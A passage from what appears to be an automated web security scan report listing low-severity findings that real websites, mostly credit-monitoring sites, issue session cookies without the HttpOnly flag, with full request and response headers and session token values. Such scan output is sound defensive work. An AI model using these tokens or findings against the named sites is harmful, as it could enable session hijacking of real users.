Set-Cookie: MachineName=IRC-P2WEB-44; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: OriginalReferrer=; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NavigationPath=s_code.axd; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: LastVisitDate=4/24/2011 5:53:47 PM; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NavFlowID=; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NumTrialDaysLeft=; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: UID=64197325b4fc4aaf8880b5f41f4897ea; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: BIGipServerfreecreditreport-web-pool=177229322.37663.0000; path=/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Mon, 25 Apr 2011 00:53:48 GMT
ETag: "pvf5967452e837e83a1b83be00044b502a"
Expires: -1
Cache-Control: no-cache
Pragma: no-cache
X-PvInfo: [S10203.C76613.A70594.RA0.G11457.U2564F1E6].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none
Content-Length: 28772

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
           Privacy Policy | Free Credit Report
       </title>
       <meta name="GENERATOR" Content="Microsoft Visual Studi
...[SNIP]...

18.126. http://www.freecreditreport.com/terms-and-conditions/javascripts/s_code.axd  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.freecreditreport.com
Path:   /terms-and-conditions/javascripts/s_code.axd

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /terms-and-conditions/javascripts/s_code.axd HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.freecreditreport.com
Cookie: s_vi=[CS]v1|26DA62F6851D24BE-40000107004A33F4[CE]

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: ASP.NET_SessionId=aq4fhj453ngtyurvzjt2qv45; path=/
Set-Cookie: MachineName=IRC-P2WEB-44; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: OriginalReferrer=; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NavigationPath=s_code.axd; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: LastVisitDate=4/24/2011 6:31:49 PM; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NavFlowID=; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NumTrialDaysLeft=; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: UID=31270744eb5a49a383daef970de2bbc3; domain=www.freecreditreport.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: BIGipServerfreecreditreport-web-pool=177229322.37663.0000; path=/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Mon, 25 Apr 2011 01:31:49 GMT
ETag: "pvaf86ec4f9d44070d194ed4ff99630aac"
Expires: -1
Cache-Control: no-cache
Pragma: no-cache
X-PvInfo: [S10203.C76613.A70594.RA0.G11457.UD5C7593].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none
Content-Length: 77206

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
           Terms and Conditions | Free Credit Report
       </title>
       <meta name="GENERATOR" Content="Microsoft Visual
...[SNIP]...

18.127. http://www.freecreditscore.com/dni/default.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.freecreditscore.com
Path:   /dni/default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dni/default.aspx?SiteVersionID=932&hmpgid=21&sc=671212&bcd=&mkwid=sIzuKLivD&pcrid=7121848622&kwid=%2Bidentity%20%2Bmonitoring HTTP/1.1
Host: www.freecreditscore.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Connection: keep-alive
Date: Sun, 24 Apr 2011 19:52:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: /dni/default.aspx?PageTypeID=HomePage21&SiteVersionID=932&SiteID=100323&sc=671212&bcd=
Set-Cookie: ASP.NET_SessionId=nbwz5z3dkngcun45ohc5mtft; path=/
Set-Cookie: MachineName=IRC-P2WEB-02; domain=www.freecreditscore.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/dni/
Set-Cookie: OriginalReferrer=; domain=www.freecreditscore.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/dni/
Set-Cookie: NavigationPath=default; domain=www.freecreditscore.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/dni/
Set-Cookie: LastVisitDate=4/24/2011 12:52:33 PM; domain=www.freecreditscore.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/dni/
Set-Cookie: NavFlowID=; domain=www.freecreditscore.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/dni/
Set-Cookie: NumTrialDaysLeft=; domain=www.freecreditscore.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/dni/
Set-Cookie: UID=b025854443ed4999b3da139730afda57; domain=www.freecreditscore.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/dni/
Content-Type: text/html; charset=utf-8
Content-Length: 219
Set-Cookie: BIGipServerfreecreditscore-web-pool=174476810.19999.0000; path=/
Cache-Control: private
X-PvInfo: [S10203.C70872.A70594.RA0.G11457.U7C72B374].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='/dni/default.aspx?PageTypeID=HomePage21&amp;SiteVersionID=932&amp;SiteID=100323&amp;sc=671212&amp;bcd='>here</a>.</h2
...[SNIP]...

18.128. http://www.freecreditscore.com/dni/javascripts/s_code.axd  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.freecreditscore.com
Path:   /dni/javascripts/s_code.axd

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /dni/javascripts/s_code.axd HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.freecreditscore.com

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: ASP.NET_SessionId=1vfadeewl31gyg55ji1nn545; path=/
Set-Cookie: MachineName=IRC-P2WEB-02; domain=www.freecreditscore.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/dni/
Set-Cookie: OriginalReferrer=; domain=www.freecreditscore.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/dni/
Set-Cookie: NavigationPath=s_code.axd; domain=www.freecreditscore.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/dni/
Set-Cookie: LastVisitDate=4/24/2011 12:54:30 PM; domain=www.freecreditscore.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/dni/
Set-Cookie: NavFlowID=; domain=www.freecreditscore.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/dni/
Set-Cookie: NumTrialDaysLeft=; domain=www.freecreditscore.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/dni/
Set-Cookie: UID=03f473ab06b94c249f0945cb39eb329d; domain=www.freecreditscore.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/dni/
Set-Cookie: BIGipServerfreecreditscore-web-pool=174476810.19999.0000; path=/
Server: Microsoft-IIS/6.0
X-AspNet-Version: 1.1.4322
X-Powered-By: ASP.NET
Content-Type: text/javascript; charset=utf-8
Date: Sun, 24 Apr 2011 19:54:29 GMT
ETag: "pv336549f7fa801179230510c1ac616073"
Expires: Tue, 26 Apr 2011 19:54:29 GMT
Cache-Control: public, s-maxage=14400, max-age=172800
X-PvInfo: [S10202.C70872.A70594.RA70541.G11457.UF483C3F].[OT/all.OG/includes]
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 65888

/* SiteCatalyst code version: H.22.1
Copyright 1997-2010 Omniture, Inc. More info available at
http://www.omniture.com */
   
if(!s_account)
var s_account = "expifcslive, expiglobal"

var s=s_gi(
...[SNIP]...

18.129. http://www.hotelclub.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.hotelclub.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.hotelclub.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private,must-revalidate, no-store, no-cache,pre-check=0, post-check=0, max-age=0, max-stale = 0
Cteonnt-Length: 232704
Content-Type: text/html; Charset=windows-1252
Expires: Sat, 23 Apr 2011 12:09:42 GMT
Cache-Control: private,must-revalidate, no-store, no-cache,pre-check=0, post-check=0, max-age=0, max-stale = 0
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 12:09:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: HTC=AppVer=1%2E0; path=/
Set-Cookie: anon=2434808611872011042422094; expires=Sun, 31-Dec-2034 13:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCCQRQCTQ=IDCOCPBACOINJJKHPNLDLKKO; path=/
Set-Cookie: NSC_JOj4vajjejllb1veb0r04rbl5rcbheu=ffffffff09d7273245525d5f4f58455e445a4a422974;path=/;httponly
Content-Length: 232704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html dir="ltr" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...

18.130. http://www.identityguard.com/ipages/le4/styles/ie.css  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.identityguard.com
Path:   /ipages/le4/styles/ie.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ipages/le4/styles/ie.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.identityguard.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDQASBDART=HKBCAEEBEEDNPAMOIACLELJF; path=/
Date: Sun, 24 Apr 2011 03:11:05 GMT
Content-Length: 92

<script type= "text/javascript"> window.location = "http://www.identityguard.com" </script>

18.131. http://www.identitymonitor.citi.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.identitymonitor.citi.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.identitymonitor.citi.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19389
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
Set-Cookie: ASP.NET_SessionId=qtcd5lzhhyp2t0jsou43qbaj; path=/
Date: Sun, 24 Apr 2011 19:45:44 GMT


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
   <title id="title">Identity Theft Protection and Credit Monitoring at Citi
...[SNIP]...

18.132. http://www.infusionsoft.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.infusionsoft.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.infusionsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:36:50 GMT
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: SESS9dd4d016da30aa43b8e02b23417e983e=a5ec6edf213d896f3903101ca35e8f6b; expires=Wed, 18-May-2011 05:10:10 GMT; path=/; domain=.infusionsoft.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 01:36:50 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Set-Cookie: LeadSource=www.infusionsoft.com; expires=Thu, 18-Aug-2011 19:23:30 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:36:49 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: visits=deleted; expires=Sun, 25-Apr-2010 01:36:49 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: LeadSource=www.infusionsoft.com; expires=Thu, 18-Aug-2011 19:23:30 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:36:49 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: visits=deleted; expires=Sun, 25-Apr-2010 01:36:49 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: LeadSource=www.infusionsoft.com; expires=Thu, 18-Aug-2011 19:23:30 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:36:49 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: LeadSource=www.infusionsoft.com; expires=Thu, 18-Aug-2011 19:23:30 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: Referer=deleted; expires=Sun, 25-Apr-2010 01:36:49 GMT; path=/; domain=.infusionsoft.com
Set-Cookie: ISFunnel=ms; expires=Tue, 26-Apr-2011 01:36:50 GMT; path=/; domain=.infusionsoft.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 30605


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
lang="en" dir
...[SNIP]...

18.133. http://www.lunlizy.net/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.lunlizy.net
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.lunlizy.net

Response

HTTP/1.1 302 Object moved
Date: Sun, 24 Apr 2011 12:43:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: Index.html
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQASRQRR=MEGPOLLBINIIAPFAMNIIPEEG; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="Index.html">here</a>.</body>

18.134. http://www.msdn.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.msdn.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.msdn.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 23
Content-Type: text/html
Location: http://msdn.microsoft.com
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDAARACQBT=GJBCPIFCBAHDFCKLKLMDHJDG; path=/
P3P: CP='ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI'
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sun, 24 Apr 2011 15:57:33 GMT
Connection: close

<!--TOOLBAR_EXEMPT-->

18.135. http://www.myfico.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.myfico.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.myfico.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server 2002, Enterprise Edition
p3p: CP="ALL DSP COR CURa PSAa PSDa OUR NOR UNI STA", policyref="http://www.myfico.com/w3c/p3p.xml"
X-Powered-By: ASP.NET
Location: /Default.aspx
Content-Length: 134
Content-Type: text/html
Expires: Mon, 25 Apr 2011 01:02:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 25 Apr 2011 01:02:43 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ASPSESSIONIDCSRCBRBB=AFNNJGFCJIOFGOFJLFOIDHPH; path=/

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/Default.aspx">here</a>.</body>

18.136. http://www.nextadvisor.com/credit_report_monitoring/compare.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.nextadvisor.com
Path:   /credit_report_monitoring/compare.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /credit_report_monitoring/compare.php?h1=4&a=2&kw=gcrmb+credit%20monitoring%20service&gclid=CPK-2pL1tagCFUxo5QodMipJDQ HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:55:25 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=8e16e97cfee8227e18a5c43f03009ed6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 54422


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...

18.137. http://www.nextadvisor.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.nextadvisor.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 16:41:25 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=956228b7ec049477b3b0ce2bf3a2ee03; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11778


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...

18.138. http://www.nextadvisor.com/link.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.nextadvisor.com
Path:   /link.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /link.php?kw=blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog20100831-blogcategory-blogcategory-blog20100914-blog20100914-blog20100916-blog20100916-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100917-blog20100917-blog20100914-blog20100916-blog20100916-blog20100916-blog20100916-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100917-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100920-blog20100921-blog20100921-blog20100921-blog20100921-blog20100920-blog20100921-blog20100922-blog20100922-blog20100923-blog20100923-blog20100921-blog20100922-blog20100922-blog20100922-blog20100922-blog20100923-blog20100923-blog20100927-blog20100923-blog20100927-blog20100923-blog2010Nets-blog2010-blog201009Ne-blog20100927-blog201009-blog2010Nets-blog20100927-blog20100927-blog201009Ne-blog20100927-blog20110415-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110418-blog20110419-blog20110419-blog20110418-blog20110418-blog20110418-blog20110419-blog20110418-blog20110419-blog20110419-blog20110419-blog20110419-blog20110419-blog20110420-blog20110419-blog20110420-blog20110420-blog20110420-blog20110421-blog20110421-blog20110420-blog20110420-blog20110421-blog20110421-blog20110422-blog20110421-blog20110422-blog20110422-blog20110421-blog20110422-blog201104Ne-blog201104-blog20110422-blog20110422-blog2011Nets-blog2011-blog2011Nets-blogNetspark-blog-blog201104Ne-blog20110422-blog20110422-blog20110422-blogNetspark-na_server-status_ordering38_alt_intro&category=security&link=eset&id=305 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nextadvisor.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 04:10:09 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
